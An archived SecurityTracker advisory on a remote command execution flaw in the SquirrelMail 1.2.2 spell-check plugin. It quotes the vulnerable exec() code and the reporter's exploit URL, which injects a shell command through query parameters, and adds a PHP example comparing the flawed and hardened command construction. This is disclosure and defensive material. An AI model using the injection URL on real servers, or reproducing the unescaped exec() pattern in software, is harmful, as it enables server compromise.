SecurityTracker.com
SecurityTracker Archives

Category:   Application (E-mail Server)  >   SquirrelMail
Vendors:   SquirrelMail Development Team
SquirrelMail Web-based Mail Server Lets Remote Users Execute Arbitrary Code on the Server
SecurityTracker Alert ID:  1003358
SecurityTracker URL:  http://securitytracker.com/id/1003358
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 25 2002
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.2.2
Description:   A vulnerability was reported in the SquirrelMail webmail server. A remote user can execute arbitrary commands on the server.

It is reported that the spell checker plugin's check_me.mod.php module builds a shell command from the PHP variables $SQSPELL_APP, $sqspell_use_app, $attachment_dir and $username_sqspell_data and passes it to exec() without having included the configuration files that define those variables. With PHP's register_globals enabled (the default in PHP releases of that time), a remote user can therefore supply all of them in the query string, choosing both the file that is read and the command it is piped into. The following type of URL will reportedly trigger the vulnerability:

host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik

Impact:   A remote user can execute commands on the server with the privileges of the web server.
Solution:   The vendor has released a fixed version (1.2.4), available at:

http://www.squirrelmail.org/download.php

Also, the following patch for 1.2.2 was supplied by a user:

http://www.dulug.duke.edu/~icon/misc/security_fix.sh.txt

Vendor URL:  www.squirrelmail.org/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


Source Message Contents

Subject:  squirrelmail bug



Squirrelmail remote execute commands bug

Version Affected :
1.2.2

SquirrelMail is a webmail system which allows users to send, get, read, etc.
mails. It has some themes, plugins, etc. One of the plugins has a very
interesting piece of code:

from file check_me.mod.php (as shipped in SquirrelMail 1.2.2):

$sqspell_command = $SQSPELL_APP[$sqspell_use_app];       // command taken from a table that this module never loads from its config
...
$floc = "$attachment_dir/$username_sqspell_data.txt";    // path built from two more globals that are never initialised here
...
exec ("cat $floc | $sqspell_command", $sqspell_output);  // unescaped shell command line handed to /bin/sh


Everything should be OK, but where does this page include the config files where
$attachment_dir and the others are defined? Answer: nowhere. We can set up the
variables $sqspell_command and $floc. Result? We can execute any command,
of course as the HTTP server owner.

Exploit:

host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik

<appelast@bsquad.sm.pl>
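The following is an added example, not SquirrelMail's code and not part of the original message or advisory. It reproduces the command-building logic of the check_me.mod.php lines quoted above, driven by the parameters from the exploit URL, beside a hardened version of the same step. The trusted speller table, the session user name, the attachment directory and the ".sqspell_data.txt" file naming are constructed for the example; nothing is executed, the script only prints the command line each version would hand to exec().

```php
<?php
// Added example (not SquirrelMail's code): the 1.2.2 command construction
// next to a hardened one. No command is executed; both are only printed.

// 1. The vulnerable shape, as quoted from SquirrelMail 1.2.2 check_me.mod.php.
//    Every variable below comes straight from the request when PHP's
//    register_globals is on, because the module never includes the config
//    that is supposed to define them.
function vulnerable_command(array $request): string
{
    $SQSPELL_APP           = $request['SQSPELL_APP'];           // attacker chooses the command table
    $sqspell_use_app       = $request['sqspell_use_app'];       // ... and which entry is used
    $attachment_dir        = $request['attachment_dir'];        // attacker chooses the directory
    $username_sqspell_data = $request['username_sqspell_data']; // ... and the file name

    $sqspell_command = $SQSPELL_APP[$sqspell_use_app];
    $floc = "$attachment_dir/$username_sqspell_data.txt";
    return "cat $floc | $sqspell_command";   // what 1.2.2 passes to exec()
}

// 2. Hardened: the command table lives only on the server, the request may
//    select a key of that table and nothing else, the data file is derived
//    from the authenticated session user, and the one interpolated path is
//    shell-escaped. Constructed stand-in for what sqspell_config.php defines:
const TRUSTED_SPELLERS = [
    'English' => '/usr/bin/ispell -a',
    'Polish'  => '/usr/bin/ispell -a -d polish',
];

function hardened_command(array $trustedSpellers, string $requestedApp,
                          string $sessionUser, string $attachmentDir): string
{
    // Only a key of the server-side table is accepted from the request.
    if (!array_key_exists($requestedApp, $trustedSpellers)) {
        throw new InvalidArgumentException("unknown speller: $requestedApp");
    }
    // The user name comes from the authenticated session, never the query
    // string; restrict it anyway so it cannot carry '/', whitespace or
    // shell metacharacters into the path.
    if (!preg_match('/^[A-Za-z0-9._-]{1,64}$/', $sessionUser)) {
        throw new InvalidArgumentException('bad user name');
    }
    $floc = $attachmentDir . '/' . $sessionUser . '.sqspell_data.txt'; // assumed naming
    // Feed the file to the speller by redirect instead of piping cat, and
    // escape the path; the speller string itself is trusted configuration.
    return $trustedSpellers[$requestedApp] . ' < ' . escapeshellarg($floc);
}

// Demonstration with the parameters from the advisory's exploit URL, as
// register_globals would have materialised them.
$exploitRequest = [
    'SQSPELL_APP'           => ['blah' => 'wall hello'],
    'sqspell_use_app'       => 'blah',
    'attachment_dir'        => '/tmp',
    'username_sqspell_data' => 'plik',
];
echo "1.2.2 would exec:        ", vulnerable_command($exploitRequest), "\n";

$attachDir = '/var/local/squirrelmail/attach';   // constructed directory
try {
    hardened_command(TRUSTED_SPELLERS, 'blah', 'alice', $attachDir);
} catch (InvalidArgumentException $e) {
    echo "hardened rejects exploit: ", $e->getMessage(), "\n";
}
echo "hardened accepts:        ",
     hardened_command(TRUSTED_SPELLERS, 'English', 'alice', $attachDir), "\n";
```

Run it with the php command-line interpreter. The vulnerable function prints "cat /tmp/plik.txt | wall hello", which is exactly the shell line the exploit URL produces; the hardened function refuses the request-supplied key "blah" and, for a legitimate key, emits a command whose only request-dependent part is a table lookup. Turning register_globals off removes the attacker's ability to set these variables at all, but the command construction should be safe regardless of that setting.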


 
 


Copyright 2019, SecurityGlobal.net LLC